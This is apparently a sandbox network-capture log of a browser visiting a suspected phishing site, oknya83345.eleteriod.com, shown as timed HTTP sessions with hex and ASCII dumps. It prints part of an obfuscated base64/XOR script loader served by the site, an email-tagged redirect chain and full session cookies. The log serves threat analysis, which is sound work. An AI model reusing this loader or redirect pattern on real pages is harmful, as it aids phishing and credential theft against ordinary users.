                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Im9udjdxQkZ3RXozRnNtQ0pxVjdPa3c9PSIsInZhbHVlIjoiWnFablhDa2k2Uys2ME5VekZXR2k2T0NUdUhnSktPOCtGc0lRcytrRFNpQzFsSDZNd0w0UDFhNng0L3NJQ2dkVVowS2J2RndjTFlaRjI5SE1oSGg5WjYrcmZSMHRaRVMxVTVPOExpbzdpZG9iMWxoYkVIS1Uxd2JqSnl4ZmtDTHMiLCJtYWMiOiJlNzU3YzE0ZmRkOTE4NmZhZTg2OTI3MDlhY2QwY2Q5OGRmOTcxYWRjZWRkZDI2MzE0MTVhYzhmMjc3OTAyYTU1IiwidGFnIjoiIn0%3D; expires=Wed, 22-May-2024 17:57:15 GMT; Max-Age=7200; path=/; secure; samesite=none
                          2024-05-22 15:57:15 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 70 6c 63 58 4a 56 62 6d 6c 55 64 46 45 79 64 79 73 76 53 56 52 44 64 44 4e 79 56 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 6d 6c 32 65 56 64 6d 55 31 6f 76 57 56 4e 33 53 31 41 77 64 47 52 6d 4c 31 64 68 56 6d 35 47 63 56 6f 76 4d 69 39 45 4d 33 42 59 53 33 41 31 62 54 68 6d 4e 6d 6c 52 4e 46 6c 6d 51 54 56 69 4f 54 4a 54 64 47 31 51 4c 33 56 69 65 6a 6c 44 5a 31 4e 44 4e 33 6c 6a 65 6a 56 47 61 69 39 30 55 32 63 7a 54 46 6c 35 52 53 74 4d 56 47 73 33 4f 54 4a 43 4c 7a 41 79 54 33 64 6f 63 7a 4a 75 59 6d 78 4b 63 56 56 6c 57 47 78 53 52 47 56 6c 51 30 74 6a 65 6b 46 4d 65 45 4e 4b 57 56 52 48 62 54 4e 36 59 69 38 78 52 6b 6b
                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InplcXJVbmlUdFEydysvSVRDdDNyVGc9PSIsInZhbHVlIjoiSml2eVdmU1ovWVN3S1AwdGRmL1dhVm5GcVovMi9EM3BYS3A1bThmNmlRNFlmQTViOTJTdG1QL3ViejlDZ1NDN3ljejVGai90U2czTFl5RStMVGs3OTJCLzAyT3doczJuYmxKcVVlWGxSRGVlQ0tjekFMeENKWVRHbTN6Yi8xRkk
                          2024-05-22 15:57:15 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                          Data Ascii: 14{"status":"success"}
                          2024-05-22 15:57:15 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.449764104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:14 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:14 UTC375INHTTP/1.1 404 Not Found
                          Date: Wed, 22 May 2024 15:57:14 GMT
                          Content-Type: application/json
                          Content-Length: 7
                          Connection: close
                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                          cf-chl-out: PHS4Cyw2njNC05ARGr8YAQ==$aGkT+2lUR7ywm8QThHLUOQ==
                          Server: cloudflare
                          CF-RAY: 887e0033bc9b4308-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:57:14 UTC7INData Raw: 69 6e 76 61 6c 69 64
                          Data Ascii: invalid


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.449765188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:16 UTC1489OUTGET /infd201971/ HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          Cache-Control: max-age=0
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Referer: https://oknya83345.eleteriod.com/infd201971/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6Im9udjdxQkZ3RXozRnNtQ0pxVjdPa3c9PSIsInZhbHVlIjoiWnFablhDa2k2Uys2ME5VekZXR2k2T0NUdUhnSktPOCtGc0lRcytrRFNpQzFsSDZNd0w0UDFhNng0L3NJQ2dkVVowS2J2RndjTFlaRjI5SE1oSGg5WjYrcmZSMHRaRVMxVTVPOExpbzdpZG9iMWxoYkVIS1Uxd2JqSnl4ZmtDTHMiLCJtYWMiOiJlNzU3YzE0ZmRkOTE4NmZhZTg2OTI3MDlhY2QwY2Q5OGRmOTcxYWRjZWRkZDI2MzE0MTVhYzhmMjc3OTAyYTU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InplcXJVbmlUdFEydysvSVRDdDNyVGc9PSIsInZhbHVlIjoiSml2eVdmU1ovWVN3S1AwdGRmL1dhVm5GcVovMi9EM3BYS3A1bThmNmlRNFlmQTViOTJTdG1QL3ViejlDZ1NDN3ljejVGai90U2czTFl5RStMVGs3OTJCLzAyT3doczJuYmxKcVVlWGxSRGVlQ0tjekFMeENKWVRHbTN6Yi8xRkkiLCJtYWMiOiJlODczNzc0NjBjYzg4NDRjOTNmNDQ5NTQ0NjAzZmVmZGVlMGUyODQ2ZDQxMjg3NDNmZWNhOTliNWJjZDFmYWZhIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:17 UTC1007INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: no-cache, private
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ihcCf2KfZJyENn%2Bo%2FTmvo36eEtjx1Wi%2F3OfKjpZJAz8Pih4CHv8q7yTGWHt2kcNwU3zpIOhIXUEXOq4V5v1RiVcHux1xaGPebMt6fwEgZQTMTrLI0Z%2F9yUDZKUu2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IlNMNlIxd0k1WFVLaTlMa1hrbXFGcmc9PSIsInZhbHVlIjoiNVVMRW1rTlFjQzc5MW9kV2VRL3VZK3piM2poTkpVYjlnZWVuMzczNmpOcy9GZjVvZDZMYjFqMWtaeS91c3FyT1lJdWU0ZFgwL080VlNleE1iUkpFYitSa0VDSEZ4Ynd5bko3RWxNMzlrYllTRk5GSld1dVhVelN6TlN4T2p4dTQiLCJtYWMiOiI1YjFiMTE5NGY1ZTE1MGE4Nzc1NWMxMmQ0OTlhYjI0ODU4MjEzOGIzNjc4Mjc2YTQ3ZmIyMzc1YmFiMmU4Mzc5IiwidGFnIjoiIn0%3D; expires=Wed, 22-May-2024 17:57:17 GMT; Max-Age=7200; path=/; secure; samesite=none
                          2024-05-22 15:57:17 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 4e 36 4e 56 4e 70 4e 32 56 57 64 56 64 34 5a 30 78 55 4e 48 46 58 4d 6a 68 43 62 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 46 42 6e 57 48 46 77 52 46 56 44 57 55 31 42 53 32 74 79 63 43 39 59 4e 6d 6c 34 4e 48 4a 70 61 56 5a 53 4d 58 6b 31 4f 48 64 79 54 55 68 51 62 33 51 34 56 55 4d 31 55 57 78 4b 55 6d 56 59 61 33 55 78 4d 44 64 5a 5a 31 4a 44 56 6a 42 58 54 47 46 61 62 33 42 57 5a 47 78 6f 56 44 5a 52 52 6d 4e 59 4e 6a 42 57 52 30 68 55 54 44 4a 43 53 7a 56 4d 61 31 46 71 52 57 74 47 4e 6a 46 75 52 46 70 49 4c 31 5a 30 55 6c 6f 78 55 48 64 6e 5a 47 52 48 65 6c 5a 6e 59 55 68 4f 56 47 68 78 4d 47 70 74 57 55 78 52 61 30 6b
                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlN6NVNpN2VWdVd4Z0xUNHFXMjhCbnc9PSIsInZhbHVlIjoiSFBnWHFwRFVDWU1BS2tycC9YNml4NHJpaVZSMXk1OHdyTUhQb3Q4VUM1UWxKUmVYa3UxMDdZZ1JDVjBXTGFab3BWZGxoVDZRRmNYNjBWR0hUTDJCSzVMa1FqRWtGNjFuRFpIL1Z0UloxUHdnZGRHelZnYUhOVGhxMGptWUxRa0k
                          2024-05-22 15:57:17 UTC1369INData Raw: 37 31 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 48 49 70 56 54 62 64 56 57 6f 28 53 72 61 53 48 41 49 71 4d 4e 2c 20 76 4d 76 66 72 76 67 72 68 46 29 20 7b 0d 0a 6c 65 74 20 52 59 56 43 4b 50 6d 55 52 71 20 3d 20 27 27 3b 0d 0a 53 72 61 53 48 41 49 71 4d 4e 20 3d 20 61 74 6f 62 28 53 72 61 53 48 41 49 71 4d 4e 29 3b 0d 0a 6c 65 74 20 61 6d 51 6d 75 63 43 49 48 49 20 3d 20 76 4d 76 66 72 76 67 72 68 46 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 53 72 61 53 48 41 49 71 4d 4e 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 52 59 56 43 4b 50 6d 55 52 71 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 53 72 61 53 48 41 49 71 4d 4e 2e 63 68 61 72 43 6f
                          Data Ascii: 714<script>function HIpVTbdVWo(SraSHAIqMN, vMvfrvgrhF) {let RYVCKPmURq = '';SraSHAIqMN = atob(SraSHAIqMN);let amQmucCIHI = vMvfrvgrhF.length;for (let i = 0; i < SraSHAIqMN.length; i++) { RYVCKPmURq += String.fromCharCode(SraSHAIqMN.charCo
                          2024-05-22 15:57:17 UTC450INData Raw: 43 79 6f 45 62 44 73 41 4a 46 73 66 57 6b 74 61 4d 78 34 68 54 33 31 6c 58 44 49 2f 45 30 55 34 46 30 77 4b 43 46 70 4c 53 6c 38 31 61 51 70 50 43 31 6c 61 43 43 56 66 4d 6e 4a 37 57 41 31 44 52 56 34 5a 57 30 64 72 64 68 30 73 47 43 77 63 45 52 34 45 48 33 38 36 59 47 56 4d 66 32 35 53 53 47 4a 32 43 44 59 51 48 51 6f 2b 50 53 77 6b 48 42 67 57 51 46 64 50 57 56 49 47 4e 7a 6f 4e 65 55 4e 36 65 45 52 53 53 47 49 68 43 44 35 63 47 41 56 4b 48 67 63 68 4e 78 55 35 56 78 6c 63 44 41 41 4e 4a 48 5a 63 63 45 38 65 48 41 41 64 48 32 77 36 44 6a 4e 5a 41 78 73 4c 48 45 59 79 4e 78 55 34 56 68 59 66 41 55 6c 6c 53 48 5a 42 63 42 67 4b 66 32 35 53 53 47 4a 32 43 44 59 51 48 51 6f 2b 50 53 77 6b 48 42 67 57 51 46 64 54 57 55 39 49 4c 43 4d 4e 50 42 45 4d 66 32 35
                          Data Ascii: CyoEbDsAJFsfWktaMx4hT31lXDI/E0U4F0wKCFpLSl81aQpPC1laCCVfMnJ7WA1DRV4ZW0drdh0sGCwcER4EH386YGVMf25SSGJ2CDYQHQo+PSwkHBgWQFdPWVIGNzoNeUN6eERSSGIhCD5cGAVKHgchNxU5VxlcDAANJHZccE8eHAAdH2w6DjNZAxsLHEYyNxU4VhYfAUllSHZBcBgKf25SSGJ2CDYQHQo+PSwkHBgWQFdTWU9ILCMNPBEMf25
                          2024-05-22 15:57:17 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.449767188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:16 UTC1098OUTGET /mxCAKSFLZHZgSbiN6uhzP4xbZjf HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6Im9udjdxQkZ3RXozRnNtQ0pxVjdPa3c9PSIsInZhbHVlIjoiWnFablhDa2k2Uys2ME5VekZXR2k2T0NUdUhnSktPOCtGc0lRcytrRFNpQzFsSDZNd0w0UDFhNng0L3NJQ2dkVVowS2J2RndjTFlaRjI5SE1oSGg5WjYrcmZSMHRaRVMxVTVPOExpbzdpZG9iMWxoYkVIS1Uxd2JqSnl4ZmtDTHMiLCJtYWMiOiJlNzU3YzE0ZmRkOTE4NmZhZTg2OTI3MDlhY2QwY2Q5OGRmOTcxYWRjZWRkZDI2MzE0MTVhYzhmMjc3OTAyYTU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InplcXJVbmlUdFEydysvSVRDdDNyVGc9PSIsInZhbHVlIjoiSml2eVdmU1ovWVN3S1AwdGRmL1dhVm5GcVovMi9EM3BYS3A1bThmNmlRNFlmQTViOTJTdG1QL3ViejlDZ1NDN3ljejVGai90U2czTFl5RStMVGs3OTJCLzAyT3doczJuYmxKcVVlWGxSRGVlQ0tjekFMeENKWVRHbTN6Yi8xRkkiLCJtYWMiOiJlODczNzc0NjBjYzg4NDRjOTNmNDQ5NTQ0NjAzZmVmZGVlMGUyODQ2ZDQxMjg3NDNmZWNhOTliNWJjZDFmYWZhIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:17 UTC583INHTTP/1.1 404 Not Found
                          Date: Wed, 22 May 2024 15:57:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXS%2F%2BieANR47Q1yL8VR8Dd97Yv%2F2mwF86UhkAFycDyPCRJ566JuDBDY2fDJoKBX%2FEJ8noq7eE%2BA1wZJPOPTXDz5tKGfyf1juXavJrwrgReidBDeYnuGD8CnEY0ebhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0041dddc6a53-EWR
                          2024-05-22 15:57:17 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.449766188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:17 UTC1464OUTGET /infd201971/?VEaheinmaa@cidel.com HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          Referer: https://oknya83345.eleteriod.com/infd201971/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IlNMNlIxd0k1WFVLaTlMa1hrbXFGcmc9PSIsInZhbHVlIjoiNVVMRW1rTlFjQzc5MW9kV2VRL3VZK3piM2poTkpVYjlnZWVuMzczNmpOcy9GZjVvZDZMYjFqMWtaeS91c3FyT1lJdWU0ZFgwL080VlNleE1iUkpFYitSa0VDSEZ4Ynd5bko3RWxNMzlrYllTRk5GSld1dVhVelN6TlN4T2p4dTQiLCJtYWMiOiI1YjFiMTE5NGY1ZTE1MGE4Nzc1NWMxMmQ0OTlhYjI0ODU4MjEzOGIzNjc4Mjc2YTQ3ZmIyMzc1YmFiMmU4Mzc5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlN6NVNpN2VWdVd4Z0xUNHFXMjhCbnc9PSIsInZhbHVlIjoiSFBnWHFwRFVDWU1BS2tycC9YNml4NHJpaVZSMXk1OHdyTUhQb3Q4VUM1UWxKUmVYa3UxMDdZZ1JDVjBXTGFab3BWZGxoVDZRRmNYNjBWR0hUTDJCSzVMa1FqRWtGNjFuRFpIL1Z0UloxUHdnZGRHelZnYUhOVGhxMGptWUxRa0kiLCJtYWMiOiJlYjliNTA1MDBjY2E1OTdjZjg1N2UzOTcxYjcyZWNkNTg1NTc4NGU1ZWY5ODM0NzI2NzNkMzk1Nzk5OTIzMjRlIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:19 UTC1130INHTTP/1.1 302 Found
                          Date: Wed, 22 May 2024 15:57:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: no-cache, private
                          Location: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LeZ3ovlQLvuEisoLepw%2BGtzPu9eHwzjp7zGvvT4eTvxgjkkZd42nVn2Wre%2BQpmlXg8hfZt5ht2SixobamVlFa63OrgjTakRJRV44tKIlSjgXHo%2BYx6dHkBztT3FPEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik1NS0UzMHNUVkFFZHRiclpaL3VaUlE9PSIsInZhbHVlIjoieEhNM1gzaTJQRXhRNkhLM3lmQURBcld0THFYT0ZlQU9wRTQwMExuVmZ6V1AxNWpmSFNKZWoxV1lNZ2VoOTM2SGkyOGFxTzlvRnBmS3FSRXpjYlJmU1pIOWlacXYrMThNaGpjSHVyaFZNMWlMWlRTS3BDTUZTUjAzSXA2SnhpbDciLCJtYWMiOiIxZjYxNTMyNWM1YTQ4ZjgzYThkMWUyOTViYmQwYzI1Y2VmZDY1NzdmN2Y2YmE4NzAxOGQ1NTgxMzE2YWZhYzFiIiwidGFnIjoiIn0%3D; expires=Wed, 22-May-2024 17:57:18 GMT; Max-Age=7200; path=/; secure; samesite=none
                          2024-05-22 15:57:19 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 70 4a 4f 56 42 6a 57 6d 4a 52 65 46 56 73 4d 54 42 43 51 6c 56 4e 4f 46 46 43 4e 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 45 52 78 54 30 4a 58 4f 57 30 7a 59 55 46 43 64 54 4e 44 53 47 46 47 59 7a 45 7a 56 31 56 79 65 58 52 30 4e 6c 56 43 64 56 64 71 65 6a 52 79 57 6d 73 78 63 32 56 47 57 6c 70 4a 4d 55 35 73 59 6b 6c 4f 5a 46 5a 6e 55 30 68 6e 51 6e 56 44 5a 30 4a 36 56 57 68 30 61 6d 59 31 51 57 35 74 54 33 46 50 63 32 35 72 55 45 4e 34 54 6d 78 6b 4d 44 6b 78 4d 33 4e 6b 5a 46 52 4b 4e 7a 5a 48 64 58 63 34 61 47 56 44 61 6a 56 57 4e 6a 4e 6b 4d 44 45 32 51 32 56 55 57 56 42 74 61 6e 52 74 57 47 64 7a 62 6e 4e 47 61 32 59
                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkpJOVBjWmJReFVsMTBCQlVNOFFCNUE9PSIsInZhbHVlIjoiRERxT0JXOW0zYUFCdTNDSGFGYzEzV1VyeXR0NlVCdVdqejRyWmsxc2VGWlpJMU5sYklOZFZnU0hnQnVDZ0J6VWh0amY1QW5tT3FPc25rUEN4TmxkMDkxM3NkZFRKNzZHdXc4aGVDajVWNjNkMDE2Q2VUWVBtanRtWGdzbnNGa2Y
                          2024-05-22 15:57:19 UTC693INData Raw: 32 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 6f 6b 6e 79 61 38 33 33 34 35 2e 65 6c 65 74 65 72 69 6f 64 2e 63 6f 6d 2f 57 50 47 43 49 4d 57 4c 4f 59 51 55 59 4b 4c 53 56 58 57 65 78 65 71 79 73 70 6b 61 68 75 75 64 6c 78 70 65 3f 4d 46 51 59 41 41 50 4f 57 4d 50 43 46 4e 4a 58 57 49 43 64 6f 66 6f 79 6d 67 63 78 61 6a 6a 74 6b 6d 68 7a 67 67 78 73 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e
                          Data Ascii: 2ae<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs'" /> <title>
                          2024-05-22 15:57:19 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.449768188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:19 UTC1509OUTGET /WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Referer: https://oknya83345.eleteriod.com/infd201971/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6Ik1NS0UzMHNUVkFFZHRiclpaL3VaUlE9PSIsInZhbHVlIjoieEhNM1gzaTJQRXhRNkhLM3lmQURBcld0THFYT0ZlQU9wRTQwMExuVmZ6V1AxNWpmSFNKZWoxV1lNZ2VoOTM2SGkyOGFxTzlvRnBmS3FSRXpjYlJmU1pIOWlacXYrMThNaGpjSHVyaFZNMWlMWlRTS3BDTUZTUjAzSXA2SnhpbDciLCJtYWMiOiIxZjYxNTMyNWM1YTQ4ZjgzYThkMWUyOTViYmQwYzI1Y2VmZDY1NzdmN2Y2YmE4NzAxOGQ1NTgxMzE2YWZhYzFiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpJOVBjWmJReFVsMTBCQlVNOFFCNUE9PSIsInZhbHVlIjoiRERxT0JXOW0zYUFCdTNDSGFGYzEzV1VyeXR0NlVCdVdqejRyWmsxc2VGWlpJMU5sYklOZFZnU0hnQnVDZ0J6VWh0amY1QW5tT3FPc25rUEN4TmxkMDkxM3NkZFRKNzZHdXc4aGVDajVWNjNkMDE2Q2VUWVBtanRtWGdzbnNGa2YiLCJtYWMiOiJiODJmZTEzOTY1MGQ5MDk5Yzk5NmQ5NDE1ODg1ZDE3N2MyNjNhOTg4MjYxZWViZGZhZmJjMjkzMzE4MTY3NmY2IiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:20 UTC1003INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: no-cache, private
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zym%2F3UnP4CBP5A8I0PgHbBJiWXCgucWUiFx4QWUZ6u8lmX4TxmocYLSX2VzWiBG%2FyrsLlRVheJ63k12Tpzdm3bB85wnHZCgnYw5kwYhWW5XfwvF4L4Pe3y56oRvfkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; expires=Wed, 22-May-2024 17:57:20 GMT; Max-Age=7200; path=/; secure; samesite=none
                          2024-05-22 15:57:20 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 49 79 56 30 64 45 54 55 35 48 64 47 78 34 63 7a 56 73 62 30 52 76 4e 43 74 57 62 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 56 56 44 57 45 6c 32 63 56 70 44 4e 56 70 44 5a 6b 35 72 51 6e 70 6a 61 58 67 7a 53 58 4a 53 63 47 6c 69 52 47 67 31 62 32 52 31 54 32 46 6d 64 45 64 76 53 44 4d 78 57 6d 5a 6e 62 6c 4a 46 63 7a 6c 4e 57 57 38 79 64 6c 5a 6b 53 45 64 47 56 6e 4e 77 59 56 4a 71 61 56 46 78 65 44 4e 4f 54 6a 46 44 51 30 5a 4f 59 30 78 32 5a 58 42 54 64 45 6c 4d 56 54 52 32 55 33 64 55 61 33 68 35 57 6e 63 30 5a 6b 35 61 61 30 63 7a 4b 31 6c 6d 51 31 6f 33 4b 32 6c 50 51 30 78 4b 54 46 5a 55 54 30 64 4e 52 43 38 79 62 6c 67
